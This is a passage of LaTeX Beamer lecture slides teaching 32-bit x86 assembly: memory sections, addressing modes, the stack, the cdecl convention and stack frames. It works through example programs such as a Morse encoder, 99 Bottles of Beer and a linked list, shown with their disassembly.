\frametitle{Example Static Allocation (example-static-alloc.S)}
\mvs
\begin{gascode}
# Put some instructions in .text
.section .text
_start:
nop
nop
nop
nop
# Put a string in .rodata
.section .rodata
anotherStr: .ascii "Another string\n\0"
# Put some magic bytes in .data
.section .data
magicByte1: .byte 0xaa
magicBytes2: .byte 0x55, 0x10
magicDWord: .long 0xdeadbeef
magicStr: .ascii "String!\0"
# Reserve 1024 uninitialized bytes in .bss
.section .bss
.comm Buffer, 1024
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-static-alloc.S -o example-static-alloc.o
$ ld example-static-alloc.o -o example-static-alloc
$ objdump -D example-static-alloc
Disassembly of section .text:
08048074 <_start>:
8048074: 90 nop
8048075: 90 nop
8048076: 90 nop
8048077: 90 nop
Disassembly of section .rodata:
08048078 <anotherStr>:
8048078: 41 inc %ecx
8048079: 6e outsb %ds:(%esi),(%dx)
804807a: 6f outsl %ds:(%esi),(%dx)
804807b: 74 68 je 80480e5 <anotherStr+0x6d>
804807d: 65 gs
804807e: 72 20 jb 80480a0 <anotherStr+0x28>
8048080: 73 74 jae 80480f6 <anotherStr+0x7e>
8048082: 72 69 jb 80480ed <anotherStr+0x75>
8048084: 6e outsb %ds:(%esi),(%dx)
8048085: 67 0a 00 or (%bx,%si),%al
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
Disassembly of section .data:
08049088 <magicByte1>:
8049088: aa stos %al,%es:(%edi)
08049089 <magicBytes2>:
8049089: 55 push %ebp
804908a: 10 ef adc %ch,%bh
0804908b <magicWord>:
804908b: ef out %eax,(%dx)
804908c: be ad de 53 74 mov $0x7453dead,%esi
0804908f <magicStr>:
804908f: 53 push %ebx
8049090: 74 72 je 8049104 <Buffer+0x64>
8049092: 69 .byte 0x69
8049093: 6e outsb %ds:(%esi),(%dx)
8049094: 67 21 00 and %eax,(%bx,%si)
Disassembly of section .bss:
080490a0 <Buffer>:
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Viewing Sections}
\mvs
\begin{itemize}
\item We can also view the program's sections with {\ttfamily objdump -x}.
\end{itemize}
\begin{textcode*}{fontsize=\fontsize{9}{8}}
$ objdump -x example-static-alloc
example-static-alloc: file format elf32-i386
example-static-alloc
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048074
Program Header:
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00000088 memsz 0x00000088 flags r-x
LOAD off 0x00000088 vaddr 0x08049088 paddr 0x08049088 align 2**12
filesz 0x0000000f memsz 0x00000418 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
0 .text 00000004 08048074 08048074 00000074 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
1 .rodata 00000010 08048078 08048078 00000078 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .data 0000000f 08049088 08049088 00000088 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .bss 00000400 080490a0 080490a0 00000097 2**4
ALLOC
...
\end{textcode*}
\end{frame}
\section{Topic 5: Reading/Writing Memory}
\begin{frame}[fragile,t]
\frametitle{Directly Accessing Memory}
\begin{itemize}
\item We've already seen how to directly access memory addresses with their label representations
\end{itemize}
\begin{gascode}
.section .text
movl magicDword, %eax # %eax = *(magicDword)
andb byteMask, %al # %al = %al & *(byteMask)
movl %eax, modifiedDword # *(magicDword) = %eax
.section .rodata # Read-only!
magicDword: .long 0xffffffff
byteMask: .byte 0x55
.section .bss # Uninitialized read-write
.comm modifiedDword, 4
\end{gascode}
\pause
\begin{itemize}
\item The memory addresses are {\bf directly encoded} in the instructions:
\end{itemize}
\begin{customobjdumpcode}
Disassembly of section .text:
8048074: a1 85 80 04 08 mov 0x8048085,%eax
8048079: 22 05 89 80 04 08 and 0x8048089,%al
804807f: a3 8c 90 04 08 mov %eax,0x804908c
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Indirect Memory Access}
\begin{itemize}
\item Many x86 instructions are capable of complex indirect addressing: \\
{\ttfamily {\footnotesize *(base register + (offset register * multiplier) + displacement)}}
\item GAS Syntax: \\
{\ttfamily {\footnotesize displacement(base register, offset register, multiplier)}}
\pause
\begin{itemize}
\item Base register can be any general purpose register
\item Offset register can be any general purpose register except {\ttfamily \%esp}
\item Multiplier can be 1, 2, 4, 8
\item Displacement is signed, up to 16-bits
\end{itemize}
\pause
\item Not all fields are required. A simplified indirect address: {\ttfamily (\%ebx) }
\begin{gascode}
movl %eax, 8(%ebx, %ecx, 4) # *(%ebx + 4*%ecx + 8) = %eax
movl %eax, 12(%ebp) # *(%ebp + 12) = %eax
movl %eax, (%ebx) # *(%ebx) = %eax
\end{gascode}
\pause
\item Makes it easy to address tables/structures
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Indirect Memory Access (example-indirect-mem.S)}
\mvs
\begin{gascode}
.section .text
_start:
movl $tableStart, %ebx # Pointer to table start
# We are moving the *value*
# $tableStart, this is not a
# memory access!
movl $0, %ecx
loop:
movl (%ebx, %ecx, 4), %eax # %eax = *(%ebx + 4*%ecx)
notl %eax # %eax = ~%eax
movl %eax, (%ebx, %ecx, 4) # *(%ebx + 4*%ecx) = %eax
incl %ecx
cmpl $10, %ecx
jl loop
.section .data
tableStart: .long 0x00000000, 0x00000001
.long 0x00000002, 0x00000003
.long 0x00000004, 0x00000005
.long 0x00000006, 0x00000007
.long 0x00000008, 0x00000009
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Ex. Indirect Memory Access (example-indirect-mem.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-indirect-mem.S -o example-indirect-mem.o
$ ld example-indirect-mem.o -o example-indirect-mem
$ objdump -D example-indirect-mem
Disassembly of section .text:
08048074 <_start>:
8048074: bb 90 90 04 08 mov $0x8049090,%ebx
8048079: b9 00 00 00 00 mov $0x0,%ecx
0804807e <loop>:
804807e: 8b 04 8b mov (%ebx,%ecx,4),%eax
8048081: f7 d0 not %eax
8048083: 89 04 8b mov %eax,(%ebx,%ecx,4)
8048086: 41 inc %ecx
8048087: 83 f9 0a cmp $0xa,%ecx
804808a: 7c f2 jl 804807e <loop>
804808c: 90 nop
Disassembly of section .data:
08049090 <tableStart>:
8049090: 00 00 add %al,(%eax)
8049092: 00 00 add %al,(%eax)
8049094: 01 00 add %eax,(%eax)
8049096: 00 00 add %al,(%eax)
8049098: 02 00 add (%eax),%al
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: Morse Encoder}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S)}
\mvs
\begin{gascode}
.section .text
.global main
main:
movl $inputWord, %esi # Pointer to input word
movl $outputMorse, %edi # Pointer to output morse
movl $0, %eax # Clear %eax
encode_loop:
movb (%esi), %al # Read the next byte of input to %al
incl %esi # Increment input word pointer
testb %al, %al # If we encounter a null byte
jz finished # jump to finished
subb $'A, %al # Adjust %al to be relative to 'A'
movl $MorseTable, %ecx # Initialize %ecx morse table pointer
lookup:
# Read the next code character into %bl
movb (%ecx, %eax, 8), %bl # %bl = *(%ecx + 8*%eax)
cmpb $' , %bl # If we encounter a space
je lookup_done # break out of the loop
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Continued}
\mvs
\begin{gascode}
# (inside lookup loop)
movb %bl, (%edi) # Copy the code character to our output morse
incl %edi # Increment output morse pointer
incl %ecx # Incerment our table pointer
jmp lookup # Loop
lookup_done:
movb $' , (%edi) # Copy a space to the output morse
incl %edi # Increment output morse pointer
movb $' , (%edi) # ...
incl %edi # ...
movb $' , (%edi) # ...
incl %edi # ...
jmp encode_loop
finished:
movb $0x00, (%edi) # Append a null byte to the output morse
incl %edi # Increment output morse pointer
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Continued}
\mvs
\begin{gascode}
pushl $outputMorse # Call puts(outputMorse);
call puts
addl $4, %esp
movl $0, %eax # Return 0
ret
.section .rodata
# Morse code lookup table
MorseTable:
.ascii ".- ", "-... ", "-.-. ", "-.. " # A, B, C, D
.ascii ". ", "..-. ", "--. ", ".... " # E, F, G, H
.ascii ".. ", ".--- ", "-.- ", ".-.. " # I, J, K, L
.ascii "-- ", "-. ", "--- ", ".--. " # M, N, O, P
.ascii "--.- ", ".-. ", "... ", "- " # Q, R, S, T
.ascii "..- ", "...- ", ".-- ", "-..- " # U, V, W, X
.ascii "-.-- ", "--.. " # Y, Z
.section .data
# Input Word Storage
inputWord: .ascii "HELLO\0"
.section .bss
# Output Morse Code Storage
.comm outputMorse, 64
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Runtime}
\mvs
\begin{textcode}
$ as morse_encoder.S -o morse_encoder.o
$ gcc morse_encoder.o -o morse_encoder
$ ./morse_encoder
.... . .-.. .-.. ---
$
\end{textcode}
\end{frame}
\section{Topic 6: Stack}
\begin{frame}[fragile,t]
\frametitle{Automatic Allocation in C}
\begin{itemize}
\item From C, we're used to automatic memory allocations in functions and blocks \{ ... \} in general
\end{itemize}
\begin{ccode}
int main(void) {
int i; /* Automatic allocation */
char buff[8]; /* Automatic allocation */
while (1) {
int j; /* Automatic allocation */
...
}
return 0;
}
\end{ccode}
\begin{itemize}
\item These allocations typically live on the {\bf stack}.
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{LIFO Stack Data Structure}
\begin{figure}
\centering
\includegraphics[height=0.60\paperheight]{figures/lifostack.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{x86 Stack}
\begin{figure}
\centering
\includegraphics[height=0.4\paperheight]{figures/x86stack.png}
\end{figure}
\begin{itemize}
\item Implemented in hardware with a "stack pointer" {\ttfamily \%esp} \\ and a chunk of memory
\item x86 stack is {\bf last in first out}, {\bf descending}, and \\ {\ttfamily \%esp} {\bf points to allocated memory}
\item OS sets up valid {\ttfamily \%esp} at program start
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Push to Stack}
\begin{figure}
\centering
\includegraphics[height=0.6\paperheight]{figures/x86stackpush.png}
\end{figure}
\begin{itemize}
\item We can push by adjusting and writing to {\ttfamily \%esp}, \\ or with the atomic {\ttfamily push} instruction
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Pop from Stack}
\begin{figure}
\centering
\includegraphics[height=0.6\paperheight]{figures/x86stackpop.png}
\end{figure}
\begin{itemize}
\item We can push by reading from and adjusting {\ttfamily \%esp}, \\ or with the atomic {\ttfamily pop} instruction
\end{itemize}
\end{frame}
\begin{frame}[fragile]
\frametitle{Stack Batch Allocation / Deallocation}
\mvs
\begin{figure}
\centering
\includegraphics[width=0.90\textwidth]{figures/x86stackalloc.png}
\end{figure}
\begin{itemize}
\item We can batch allocate/deallocate space by simply adjusting {\ttfamily \%esp}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S)}
\mvs
\begin{gascode}
# Stack is now
# | ... | <-- %esp = 0x8xxxxxxx
movl $0x05, %eax # Load 0x00000005 into %eax
pushl %eax # Push dword 0x00000005 onto the stack
incl %eax # %eax += 1
pushl %eax # Push dword 0x00000006 onto the stack
pushl $0xdeadbeef # Push dword 0xdeadbeef onto the stack
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 |
# | 0xdeadbeef | <-- %esp = 0x8xxxxxxx
popl %ebx # Pop dword off of the stack,
# %ebx = 0xdeadbeef now
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 | <-- %esp = 0x8xxxxxxx
# | 0xdeadbeef |
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S)}
\mvs
\begin{gascode}
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 | <-- %esp = 0x8xxxxxxx
# | 0xdeadbeef |
addl $4, %esp # Deallocate 4 bytes off of the stack
# Stack is now
# | ... |
# | 0x00000005 | <-- %esp = 0x8xxxxxxx
# | 0x00000006 |
# | 0xdeadbeef |
movl $0xaaaaaaaa, (%esp) # Write 0xaaaaaaaa to the stack
# Stack is now
# | ... |
# | 0xaaaaaaaa | <-- %esp = 0x8xxxxxxx
# | 0x00000006 |
# | 0xdeadbeef |
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-stack.S -o example-stack.o
$ ld example-stack.o -o example-stack
$ objdump -D example-stack
Disassembly of section .text:
08048054 <_start>:
8048054: b8 05 00 00 00 mov $0x5,%eax
8048059: 50 push %eax
804805a: 40 inc %eax
804805b: 50 push %eax
804805c: 68 ef be ad de push $0xdeadbeef
8048061: 5b pop %ebx
8048062: 83 c4 04 add $0x4,%esp
8048065: c7 04 24 aa aa aa aa movl $0xaaaaaaaa,(%esp)
...
\end{customobjdumpcode}
\end{frame}
\section{Topic 7: Functions and cdecl Convention}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily call} and {\ttfamily ret}}
\mvs
\begin{itemize}
\item {\ttfamily jmp <label>} merely updates {\ttfamily \%eip} to address of {\ttfamily <label>}
\item {\ttfamily call <label>} pushes a return address onto the stack, then jumps to {\ttfamily <label>}
\item {\ttfamily ret} pops the return address off the stack, and jumps to it
\end{itemize}
\begin{gascode}
# Stack is now
# | ... |
movl $0, %eax
call addOneToEax
# Stack is once again
# | ... |
call addOneToEax
call addOneToEax
# %eax is now 3
...
addOneToEax:
# Stack is now
# | ... |
# | retaddr | <- %esp
incl %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Function Arguments on the Stack}
\mvs
\begin{itemize}
\item Arguments can be passed on the stack to functions
\end{itemize}
\begin{gascode}
pushl $5
call doubleArg
# %eax is now 10
...
doubleArg:
# Stack is now
# | ... |
# | 0x00000005 | <- %esp+4
# | retaddr | <- %esp
movl 4(%esp), %eax # %eax = *(%esp+4)
addl %eax, %eax # %eax += %eax
ret
\end{gascode}
\begin{itemize}
\item or via registers?
\end{itemize}
\begin{gascode}
movl $5, %eax
# %eax is 5
call doubleArg
# %eax is now 10
doubleArg:
addl %eax, %eax # %eax += %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily cdecl} Calling Convention}
\begin{itemize}
\item How can we ensure that our CPU state \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, \%edi, ...}) \\ doesn't get corrupted when a function needs to use those registers to do useful work?
\pause
\item How should we pass arguments to functions?
\begin{itemize}
\item Fixed memory addresses? Stack? Registers?
\end{itemize}
\pause
\item GCC on Linux uses the {\ttfamily cdecl} calling convention
\begin{itemize}
\item function arguments pushed onto the stack from right to left
\item {\ttfamily \%eax, \%ecx, \%edx} can be used by the function \\ (must be preserved by caller if necessary)
\item other registers are preserved by function
\item return value in {\ttfamily \%eax}
\item function arguments pushed onto the stack must be cleaned up by caller
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S)}
\begin{gascode}
.section .text
# sumThreeNumbers(*magicNumber, 5, 12);
pushl $12 # Push 0x000000C
pushl $5 # Push 0x0000005
pushl magicNumber # Push *magicNumber
call sumThreeNumbers
addl $12, %esp # Clean up arguments off of the stack
# %eax is 59
sumThreeNumbers:
# Stack is now
# | ... |
# | 12 | <- %esp+12
# | 5 | <- %esp+8
# | 42 | <- %esp+4
# | retaddr | <- %esp
movl $0, %eax # Clear %eax
addl 4(%esp), %eax # %eax += *(%esp+4)
addl 8(%esp), %eax # %eax += *(%esp+8)
addl 12(%esp), %eax # %eax += *(%esp+12)
ret
.section .data
magicNumber: .long 42
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-cdecl.S -o example-cdecl.o
$ ld example-cdecl.o -o example-cdecl
$ objdump -D example-cdecl
Disassembly of section .text:
08048074 <_start>:
8048074: 6a 0c push $0xc
8048076: 6a 05 push $0x5
8048078: ff 35 98 90 04 08 pushl 0x8049098
804807e: e8 03 00 00 00 call 8048086 <sumThreeNumbers>
8048083: 83 c4 0c add $0xc,%esp
08048086 <sumThreeNumbers>:
8048086: b8 00 00 00 00 mov $0x0,%eax
804808b: 03 44 24 04 add 0x4(%esp),%eax
804808f: 03 44 24 08 add 0x8(%esp),%eax
8048093: 03 44 24 0c add 0xc(%esp),%eax
8048097: c3 ret
Disassembly of section .data:
08049098 <magicNumber>:
8049098: 2a 00 sub (%eax),%al
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S)}
\vspace{-0.5em}
\begin{itemize}
\item {\ttfamily libc} library functions you use in C (strings, math, time, files, sockets, etc.) are all accessible in assembly when linking with libc
\item Follow the {\ttfamily cdecl} calling convention
\end{itemize}
\vspace{0.25em}
\begin{gascode}
.section .text
.global main
main:
# %eax = time(NULL);
pushl $0
call time
add $4, %esp
# *curtime = %eax
movl %eax, curtime
# %eax = localtime(&curtime);
pushl $curtime
call localtime
add $4, %esp
# %eax = asctime(%eax);
pushl %eax
call asctime
add $4, %esp
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Continued}
\begin{gascode}
# printf("%s\n", %eax);
pushl %eax
pushl $formatStr
call printf
add $8, %esp
ret
.section .data
.comm curtime, 4
formatStr: .ascii "%s\0"
\end{gascode}
{\small Runtime:}
\begin{textcode}
$ as example-libc.S -o example-libc.o
$ gcc example-libc.o -o example-libc
$ ./example-libc
Wed Jan 25 16:13:27 2012
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-libc.S -o example-libc.o
$ ld example-libc.o -o example-libc
$ objdump -D example-libc
Disassembly of section .text:
...
0804848c <main>:
804848c: 6a 00 push $0x0
804848e: e8 ad fe ff ff call 8048340 <time@plt>
8048493: 83 c4 04 add $0x4,%esp
8048496: a3 30 97 04 08 mov %eax,0x8049730
804849b: 68 30 97 04 08 push $0x8049730
80484a0: e8 cb fe ff ff call 8048370 <localtime@plt>
80484a5: 83 c4 04 add $0x4,%esp
80484a8: 50 push %eax
80484a9: e8 a2 fe ff ff call 8048350 <asctime@plt>
80484ae: 83 c4 04 add $0x4,%esp
80484b1: 50 push %eax
80484b2: 68 28 97 04 08 push $0x8049728
80484b7: e8 74 fe ff ff call 8048330 <printf@plt>
80484bc: 83 c4 08 add $0x8,%esp
80484bf: c3 ret
...
\end{customobjdumpcode}
\end{frame}
\section{Entry Points}
\begin{frame}[fragile,t]
\frametitle{Plain Entry Point}
\begin{itemize}
\item ELF binary specifies an entry point address for the OS to set initial {\ttfamily \%eip} to
\item {\ttfamily ld} expects this to be specified by the symbol {\ttfamily \_start}
\end{itemize}
\pause
\begin{gascode}
.section .text
.global _start # Export the symbol
_start:
nop # Off to a good start...
nop
nop
loop: jmp loop # Loop forever
\end{gascode}
\begin{textcode}
$ as test.S -o test.o
$ ld test.o -o test
$ ./test
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} Entry Point}
\begin{itemize}
\item When we link with {\ttfamily libc}, it provides its own {\ttfamily \_start} to do some initialization, which eventually will call {\ttfamily main}
\item We provide a {\ttfamily main} and also a return back to libc with {\ttfamily ret} and a return value in {\ttfamily \%eax}
\item libc {\ttfamily exit()'s} with this value
\end{itemize}
\pause
\begin{gascode}
.section .text
.global main
main:
nop
nop
nop
movl $3, %eax # Return 3!
ret
\end{gascode}
\begin{textcode}
$ as test.S -o test.o
$ gcc test.o -o test # Use gcc to invoke ld to link with libc
$ ./test
$ echo $?
3
$
\end{textcode}
\end{frame}
\section{Program Example: 99 Bottles of Beer on the Wall}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
.section .text
.global main
main:
movl $99, %eax # Start with 99 bottles!
# We could use a cdecl callee preserved register,
# but we'll make it hard on ourselves to practice
# caller saving/restoring
# printf(char *format, ...);
more_beer:
# Save %eax since it will get used by printf()
pushl %eax
# printf(formatStr1, %eax, %eax);
pushl %eax
pushl %eax
pushl $formatStr1 # *Address* of formatStr1
call printf
addl $12, %esp # Clean up the stack
# Restore %eax
popl %eax
# Drink a beer
decl %eax
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
# Save %eax
pushl %eax
# printf(formatStr2, %eax);
pushl %eax
pushl $formatStr2 # *Address* of formatStr2
call printf
addl $8, %esp # Clean up the stack
# Restore %eax
popl %eax
# Loop
test %eax, %eax
jnz more_beer
# printf(formatStr3);
pushl $formatStr3
call printf
addl $4, %esp
movl $0, %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
.section .data
formatStr1:
.ascii "%d bottles of beer on the wall! %d bottles of beer!\n\0"
formatStr2:
.ascii "Take one down, pass it around, %d bottles of beer on the wall!\n\0"
formatStr3:
.ascii "No more bottles of beer on the wall!\n\0"
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S) Runtime}
\begin{textcode}
$ as 99_bottles_of_beer.S -o 99_bottles_of_beer.o
$ gcc 99_bottles_of_beer.o -o 99_bottles_of_beer
$ ./99_bottles_of_beer
99 bottles of beer on the wall! 99 bottles of beer!
Take one down, pass it around, 98 bottles of beer on the wall!
98 bottles of beer on the wall! 98 bottles of beer!
Take one down, pass it around, 97 bottles of beer on the wall!
97 bottles of beer on the wall! 97 bottles of beer!
...
3 bottles of beer on the wall! 3 bottles of beer!
Take one down, pass it around, 2 bottles of beer on the wall!
2 bottles of beer on the wall! 2 bottles of beer!
Take one down, pass it around, 1 bottles of beer on the wall!
1 bottles of beer on the wall! 1 bottles of beer!
Take one down, pass it around, 0 bottles of beer on the wall!
No more bottles of beer on the wall!
$
\end{textcode}
\end{frame}
\section{Topic 8: Stack Frames}
\begin{frame}[fragile,t]
\frametitle{Where did that argument go?}
\mvs
\begin{itemize}
\item Referring to arguments with {\ttfamily \%esp} in a function is easy, until you start moving around {\ttfamily \%esp} itself.
\end{itemize}
\begin{gascode}
pushl $5
call doSomething
addl $4, %esp
...
doSomething:
# Stack is now
# | ... |
# | 5 | <- %esp+4
# | retaddr | <- %esp
# Argument is at %esp+4
subl $12, %esp # Allocate 12 bytes on the stack
# Stack is now
# | ... |
# | 5 | <- %esp+16
# | retaddr | <- %esp+12
# | local var | <- %esp+8
# | local var | <- %esp+4
# | local var | <- %esp
# Argument is now at %esp+16 !
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer}
\begin{itemize}
\item What if we had an anchor point in our stack at the start of our function?
\item We could have constant offsets above to arguments and below to allocated variables from the anchor point
\pause
\item This is the conventional role of register {\ttfamily \%ebp}, the frame pointer \\ (also called base pointer)
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer Prologue}
\mvs
\begin{gascode}
pushl $5
call doSomething
addl $4, %esp
...
doSomething:
pushl %ebp # Function is responsible for saving this in cdecl!
movl %esp, %ebp # Anchor %ebp at the current %esp
# Stack is now
# | ... |
# | 5 | <- %esp+8 %ebp+8
# | retaddr | <- %esp+4 %ebp+4
# | old %ebp | <- %esp %ebp
# Argument is at %ebp+8
subl $12, %esp # Allocate 12 bytes on the stack
# Stack is now
# | ... |
# | 5 | <- %esp+20 %ebp+8
# | retaddr | <- %esp+16 %ebp+4
# | old %ebp | <- %esp+12 %ebp
# | local var | <- %esp+8 %ebp-4
# | local var | <- %esp+4 %ebp-8
# | local var | <- %esp %ebp-12
# Argument is still always at %ebp+8
# Allocated memory always at %ebp-4, %ebp-8, %ebp-12
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer Epilogue}
\begin{itemize}
\item To have a valid return address on the stack, we must reset {\ttfamily \%esp} to its previous value and pop the saved frame pointer
\item This conveniently also deallocates any space we allocated on the stack
\end{itemize}
\begin{gascode}
movl %ebp, %esp # Restore %esp, deallocating space on the stack
popl %ebp # Restore the frame pointer
ret # Return
\end{gascode}
\end{frame}
\begin{frame}[fragile]
\frametitle{Stack Frame in a Nutshell}
\mvs
\begin{figure}
\centering
\includegraphics[width=0.68\textwidth]{figures/stackframe.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S)}
\mvs
\begin{gascode}
.section .text
_start:
pushl $22
pushl $20
pushl $42
pushl $3
call sumNumbers
addl $16, %esp
# %eax is now 84
# sumNumbers(int n, ...)
sumNumbers:
# Function prologue, save old frame pointer and setup new one
pushl %ebp
movl %esp, %ebp
movl $0, %eax # Clear %eax
movl $0, %ecx # Clear %ecx
movl 8(%ebp), %edx # Copy argument 1, n, into %edx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S)}
\mvs
\begin{gascode}
sumLoop:
# Add argument 2, 3, 4, ... n+1 in %eax
# Argument 2 starts at %ebp+12
addl 12(%ebp, %ecx, 4), %eax
incl %ecx
# Loop
decl %edx
jnz sumLoop
# Function epilogue, deallocate and restore old frame pointer
movl %ebp, %esp
popl %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S) Disassembly}
\mvs
\begin{customobjdumpcode*}{fontsize=\fontsize{8}{8}}
$ as example-ebp.S -o example-ebp.o
$ ld example-ebp.o -o example-ebp
$ objdump -D example-ebp
Disassembly of section .text:
08048054 <_start>:
8048054: 6a 16 push $0x16
8048056: 6a 14 push $0x14
8048058: 6a 2a push $0x2a
804805a: 6a 03 push $0x3
804805c: e8 03 00 00 00 call 8048064 <sumNumbers>
8048061: 83 c4 10 add $0x10,%esp
08048064 <sumNumbers>:
8048064: 55 push %ebp
8048065: 89 e5 mov %esp,%ebp
8048067: b8 00 00 00 00 mov $0x0,%eax
804806c: b9 00 00 00 00 mov $0x0,%ecx
8048071: 8b 55 08 mov 0x8(%ebp),%edx
08048074 <sumLoop>:
8048074: 03 44 8d 0c add 0xc(%ebp,%ecx,4),%eax
8048078: 41 inc %ecx
8048079: 4a dec %edx
804807a: 75 f8 jne 8048074 <sumLoop>
804807c: 89 ec mov %ebp,%esp
804807e: 5d pop %ebp
804807f: c3 ret
...
\end{customobjdumpcode*}
\end{frame}
\part{2}
\section{Topic 9: Command-line Arguments}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily argc} and {\ttfamily **argv} on the stack}
\mvs
\begin{itemize}
\item In the {\ttfamily \_start} entry point, first argument on the stack is {\ttfamily argc}, followed by {\ttfamily argv[0], argv[1], ...}
\end{itemize}
\begin{gascode}
.section .text
.global _start
_start:
pushl %ebp
movl %esp, %ebp
# argc is at %ebp+4, argv[0] is at %ebp+8, argv[1] is at %ebp+12
\end{gascode}
\begin{itemize}
\item In the {\ttfamily main} entry point with libc, {\ttfamily argc, **argv} will be on the stack after the return address to libc, we have to dereference to get to the args!
\end{itemize}
\begin{gascode}
.section .text
.global main
main:
pushl %ebp
movl %esp, %ebp
# return address to libc is at %ebp+4
# argc is at %ebp+8, **argv is at %ebp+12
# *argv[0] = *(%ebp+12), *argv[1] = *(%ebp+12)+4
\end{gascode}
\end{frame}
\section{Program Example: Linked List}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S)}
\mvs
\begin{gascode}
.section .text
.global main
# struct list { int data; struct list *next; };
#
# [ int data; ][ list *next; ] 8 bytes total
# \ 4 bytes / \ 4 bytes /
# list *list_alloc(int data);
list_alloc:
pushl $8 # %eax = malloc(8);
call malloc
addl $4, %esp
testl %eax, %eax # if (%eax == NULL)
jz fatal # goto fatal;
movl 4(%esp), %ecx
movl %ecx, (%eax) # %eax->data = data
movl $0, 4(%eax) # %eax->next = 0
ret
# Dirty error handling
fatal:
jmp fatal
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
# void list_add(list *head, int data);
list_add:
push %ebp
mov %esp, %ebp
subl $4, %esp # list *n;
pushl 12(%ebp) # %eax = list_alloc(data);
call list_alloc
addl $4, %esp
mov %eax, -4(%ebp) # n = %eax;
mov 8(%ebp), %eax # %eax = head
traverse_add:
cmpl $0, 4(%eax) # if (%eax->next == NULL)
jz at_end_add # goto at_end_add;
movl 4(%eax), %eax # %eax = %eax->next
jmp traverse_add # Loop
at_end_add:
movl -4(%ebp), %ecx # %ecx = n
movl %ecx, 4(%eax) # %eax->next = %ecx
mov %ebp, %esp
pop %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
# void list_dump(list *head);
list_dump:
push %ebp
mov %esp, %ebp
